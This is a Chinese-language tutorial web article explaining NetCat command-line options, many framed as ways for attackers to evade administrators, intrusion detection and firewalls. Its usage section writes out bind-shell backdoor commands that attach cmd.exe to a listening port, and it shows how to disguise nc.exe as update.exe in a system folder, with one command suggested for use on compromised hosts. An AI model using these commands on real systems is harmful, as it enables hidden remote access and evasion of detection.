IT貓撲網(wǎng):您身邊最放心的安全下載站! 最新更新|軟件分類(lèi)|軟件專(zhuān)題|手機(jī)版|論壇轉(zhuǎn)貼|軟件發(fā)布

您當(dāng)前所在位置: 首頁(yè)網(wǎng)絡(luò)安全安全防護(hù) → 網(wǎng)絡(luò)安全中“瑞士軍刀” nc

網(wǎng)絡(luò)安全中“瑞士軍刀” nc

時(shí)間:2015-06-28 00:00:00 來(lái)源:IT貓撲網(wǎng) 作者:網(wǎng)管聯(lián)盟 我要評(píng)論(0)

在入侵中它是最經(jīng)典的工具之一 ,NetCat被所有的網(wǎng)絡(luò)安全愛(ài)好者和研究者稱(chēng)之為瑞士軍刀,通過(guò)名字大家就能知道他的功能足夠豐富。

nc的全稱(chēng)為NetCat,它能夠建立并接受傳輸控制協(xié)議(TCP)和用戶(hù)數(shù)據(jù)報(bào)協(xié)議(UDP)的連接,Netcat可在這些連接上讀寫(xiě)數(shù)據(jù),直到連接關(guān)閉為止。它可以通過(guò)手工或者腳本與應(yīng)用層的網(wǎng)絡(luò)應(yīng)用程序或服務(wù)進(jìn)行交互。從技術(shù)上來(lái)講,NetCat并不能產(chǎn)生UDP連接,因?yàn)閁DP是一種無(wú)連接的協(xié)議。NetCat沒(méi)有圖形界面,很粗糙,很原始。

nc可以通過(guò)很多途徑下載得到,unix和Winodws平臺(tái)下的官方站點(diǎn)是:http://www.atsake.com/research/tools/network_utilities.

nc的命令行

nc的基本命令行形式是 nc [options] host ports,其中host是要掃描的主機(jī)名或IP地址,ports要么是一個(gè)單獨(dú)的端口,要么是一個(gè)端口范圍(用m-n的形式指定),要么是一系列用空格隔開(kāi)的單個(gè)端口。

-d? 只對(duì)Windows操作系統(tǒng)有用,該選項(xiàng)使NetCat以隱蔽模式工作,從而脫離MS-DOS命令提示符下環(huán)境運(yùn)行,使得nc不需要保持打開(kāi)命令窗口便可在監(jiān)聽(tīng)模式下運(yùn)行,也可以幫助黑客很好地隱藏監(jiān)聽(tīng)NetCat實(shí)例而不被系統(tǒng)管理員發(fā)現(xiàn)。

-e 如果NetCat使用gaping_security_hole選項(xiàng)進(jìn)行編譯,那么只要某人在NET后臺(tái)所監(jiān)聽(tīng)的任何端口上建立連接,該NetCat都將執(zhí)行,且客戶(hù)端的NetCat會(huì)通過(guò)管道將I/O傳輸?shù)皆趧e處監(jiān)聽(tīng)的另一個(gè)NetCat實(shí)例中。使用這個(gè)選項(xiàng)非常危險(xiǎn),除非你對(duì)nc相當(dāng)了解,起碼知道你自己在做什么。這是在系統(tǒng)中建立后門(mén)shell的一個(gè)非??旖萸胰菀椎姆椒ā?/p>

-i 延時(shí)間隔,表示在兩次數(shù)據(jù)發(fā)送之間nc等待的時(shí)間。例如:當(dāng)經(jīng)過(guò)管道傳輸一個(gè)文件到nc的時(shí)候,在傳輸輸入的下一行之前,nc將等待的秒數(shù)。當(dāng)使用nc對(duì)一臺(tái)主機(jī)的多個(gè)端口之間進(jìn)行操作時(shí),在切換到下一個(gè)端口之前,nc等待的秒數(shù)。這樣可以使黑客在進(jìn)行數(shù)據(jù)傳輸或?qū)σ粋€(gè)服務(wù)進(jìn)行攻擊的時(shí)候更加隱蔽,也可以幫助你的端口掃描不被入侵檢測(cè)系統(tǒng)和系統(tǒng)管理員發(fā)現(xiàn)。

-g這個(gè)選項(xiàng)具有欺騙性。nc支持loose source routing(松散源路由)。你可以在命令行中指定多達(dá)8個(gè)-g選項(xiàng)來(lái)強(qiáng)迫nc流量經(jīng)過(guò)特定的IP地址,這在你為流量設(shè)置偽造的源IP地址時(shí),可以利用這個(gè)方法達(dá)到通過(guò)防火墻的過(guò)濾器或者允許訪問(wèn)主機(jī)列表,希望接收到從主機(jī)返回的響應(yīng)。

-G該選項(xiàng)讓用戶(hù)在-g選項(xiàng)所指定的路由列表中指定的一個(gè)地址作為當(dāng)前的下一路由,由于IP地址為4字節(jié)大小(IPV4),所以這個(gè)參數(shù)總是4字節(jié)的倍數(shù);例如,4代表路由表中的第一個(gè)IP地址,8代表第二個(gè)IP地址,依次類(lèi)推。這在偽造部分源路由表使得報(bào)文看起來(lái)相當(dāng)?shù)挠杏谩T谶M(jìn)行欺騙和源路由時(shí),這個(gè)功能有助于屏蔽你的位置,但也不一定能接收到響應(yīng)報(bào)文,因?yàn)轫憫?yīng)報(bào)文將經(jīng)過(guò)由偽造的IP地址反路由回來(lái)。

-l 該選項(xiàng)切換nc的監(jiān)聽(tīng)模式。此選項(xiàng)必須與-p選項(xiàng)一起使用以告訴nc綁定某個(gè)指定的TCP端口并等待到來(lái)的連接。若換成-u選項(xiàng),則應(yīng)使用UDP端口而非TCP端口。

-L 該選項(xiàng)在Windows版本中有用,當(dāng)一個(gè)連接被關(guān)閉后,使用相同的命令行選項(xiàng)進(jìn)行重啟監(jiān)聽(tīng)模式,即使此時(shí)初始的連接已經(jīng)結(jié)束,nc也能在不需要用戶(hù)干涉的情況下接收后面新的連接。與-l一樣,必須與-p同時(shí)使用。

-n 該選項(xiàng)告訴我們nc不做任何主機(jī)名查找的工作。

-0 對(duì)數(shù)據(jù)執(zhí)行一次十六進(jìn)制轉(zhuǎn)儲(chǔ)(hex dump )并將其存儲(chǔ)在hexfile中。命令nc-o hexfile將把雙向通信的數(shù)據(jù)記錄下來(lái),在每行的開(kāi)始處會(huì)有一個(gè)"<"或">"用來(lái)分別指示是進(jìn)入數(shù)據(jù)還是外出數(shù)據(jù)。如果只想得到對(duì)進(jìn)入數(shù)據(jù)的十六進(jìn)制轉(zhuǎn)儲(chǔ),可以使用 nc -o數(shù)據(jù)的十六進(jìn)制轉(zhuǎn)儲(chǔ),則可以使用NC -o>hexfile命令。

-p 讓用戶(hù)指定一個(gè)nc應(yīng)使用的本地端口號(hào)。當(dāng)通過(guò)-l或-L選項(xiàng)來(lái)使用監(jiān)聽(tīng)模式的時(shí)候,這個(gè)參數(shù)是必需的。如果沒(méi)有為外出連接指定這個(gè)參數(shù),則與大多數(shù)其他TCP或UDP客戶(hù)程序的做法一樣,nc將使用系統(tǒng)分配給他的任何端口。

-r 該參數(shù)使nc可以隨機(jī)選擇本地和遠(yuǎn)程端口。當(dāng)使用nc在系統(tǒng)中范圍很大的一批端口上獲取信息時(shí),要想混合源端口和目標(biāo)端口的順序看起來(lái)不怎么象端口掃描,這個(gè)選項(xiàng)是很有用的。當(dāng)這個(gè)選項(xiàng)與-i選項(xiàng)和一個(gè)足夠大的間隔結(jié)合使用的時(shí)候,在不被注意的端口掃描成功幾率能得到很大提升。

-s 指定nc建立連接時(shí)所使用的IP地址,該選項(xiàng)允許黑客做一些工作,它允許黑客隱藏他們的IP地址或假冒他人的IP地址,但是要得到路由到他們所欺騙的地址的任何信息,都需要使用-g源路由選項(xiàng)。其次,當(dāng)處于監(jiān)聽(tīng)模式時(shí),大多數(shù)情況下都可以與一個(gè)已經(jīng)監(jiān)聽(tīng)的服務(wù)"預(yù)先綁定",所有TCP和UDP服務(wù)都綁定到某個(gè)端口。

-t 如果使用telnet選項(xiàng)編譯,nc就可以與telnet服務(wù)器進(jìn)行telnet選項(xiàng)協(xié)商,雖然它的響應(yīng)是毫無(wú)意義的信息,但可以通過(guò)該狀態(tài)看到連接23端口的信息。

-u nc使用UDP而非TCP,在客戶(hù)模式和監(jiān)聽(tīng)模式下都起作用。

-v 控制nc將要做的事情達(dá)到的程度,如使用nc -v,那么nc將僅吐出它所接收到的數(shù)據(jù),一個(gè)單獨(dú)的-v可以知道它連接或綁定的地址是否有問(wèn)題發(fā)生,第2個(gè)-v可以讓nc在一個(gè)連接結(jié)束的時(shí)候讓你知道這個(gè)連接總共發(fā)送和接收了多少數(shù)據(jù)。

-w 控制在一個(gè)連接上nc放棄之前等待的時(shí)間。同時(shí)也告訴nc當(dāng)在標(biāo)準(zhǔn)輸入上接收到一個(gè)eof(end-of-file)之后應(yīng)該等待多長(zhǎng)時(shí)間來(lái)關(guān)閉連接并退出。如果你通過(guò)nc向遠(yuǎn)程服務(wù)器發(fā)送命令并且期望大量的數(shù)據(jù)返回(例如:向一臺(tái)web服務(wù)器發(fā)送一個(gè)http命令以下載一個(gè)大文件),該選項(xiàng)是很有用的。

nc的具體使用

c:\nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隱藏一個(gè)NetCat后門(mén)。

c:\nc.exe -p 4455 -d -L -e cmd.exe 這個(gè)命令可以讓黑客利用NetCat重新返回系統(tǒng),直到系統(tǒng)管理員在任務(wù)管理器中看見(jiàn)nc.exe在運(yùn)行,從而發(fā)現(xiàn)這個(gè)后門(mén),我們一樣可以把它做的更加隱蔽,

c:\move nc.exe c:\windows\system32\Drivers\update.exe

c:\windows\systeme32\drivers\update.exe -p 4455 -d -L -e cmd.exe
系統(tǒng)管理員可能把特權(quán)附屬于一些無(wú)害的程序,如update.exe等,黑客也可以隱藏命令行。

c:\windows\systme32\drivers\update.exe
cmd line: -l -p 4455 -d -L -e cmd.exe

c:\>
nc -l - p 80? 監(jiān)聽(tīng)80端口
nc -l -p 80 >c:\log.dat? 監(jiān)聽(tīng)80端口,并把信息記錄到log.dat中
nc -v -l -p 80? 監(jiān)聽(tīng)80端口,并顯示端口信息
nc -vv -l -p 80 監(jiān)聽(tīng)80端口,顯示更詳細(xì)的端口信息
nc -l -p 80 -t -e cmd.exe監(jiān)聽(tīng)本地的80端口的入站信息,同時(shí)將cmd.exe重定向到80端口,當(dāng)有人連接的時(shí)候,就讓cmd.exe以telnet的形式應(yīng)答。當(dāng)然這個(gè)最好用在控制的肉雞上。
nc -v ip port 掃瞄某IP的某個(gè)端口
nc -v -z ip port-port掃描某IP的端口到某端口
nc -v -z -u ip? port-port掃描某IP的某UDP端口到某UDP端口

關(guān)鍵詞標(biāo)簽:nc,網(wǎng)絡(luò)安全,瑞士軍刀

相關(guān)閱讀

文章評(píng)論
發(fā)表評(píng)論

熱門(mén)文章 火絨安全軟件開(kāi)啟懸浮窗的方法-怎么限制和設(shè)置軟件網(wǎng)速 火絨安全軟件開(kāi)啟懸浮窗的方法-怎么限制和設(shè)置軟件網(wǎng)速 火絨安全軟件怎么攔截廣告-火絨設(shè)置廣告攔截的方法 火絨安全軟件怎么攔截廣告-火絨設(shè)置廣告攔截的方法 網(wǎng)絡(luò)安全管理軟件-PCHunter使用教程 網(wǎng)絡(luò)安全管理軟件-PCHunter使用教程 騰訊QQ密碼防盜十大建議 騰訊QQ密碼防盜十大建議

相關(guān)下載

    人氣排行 火絨安全軟件開(kāi)啟懸浮窗的方法-怎么限制和設(shè)置軟件網(wǎng)速 火絨安全軟件怎么攔截廣告-火絨設(shè)置廣告攔截的方法 網(wǎng)絡(luò)安全管理軟件-PCHunter使用教程 xp系統(tǒng)關(guān)閉445端口方法_ 教你如何關(guān)閉xp系統(tǒng)445端口 什么是IPS(入侵防御系統(tǒng)) 企業(yè)網(wǎng)絡(luò)安全事件應(yīng)急響應(yīng)方案 ARP協(xié)議的反向和代理 Windows Server 2008利用組策略的安全設(shè)置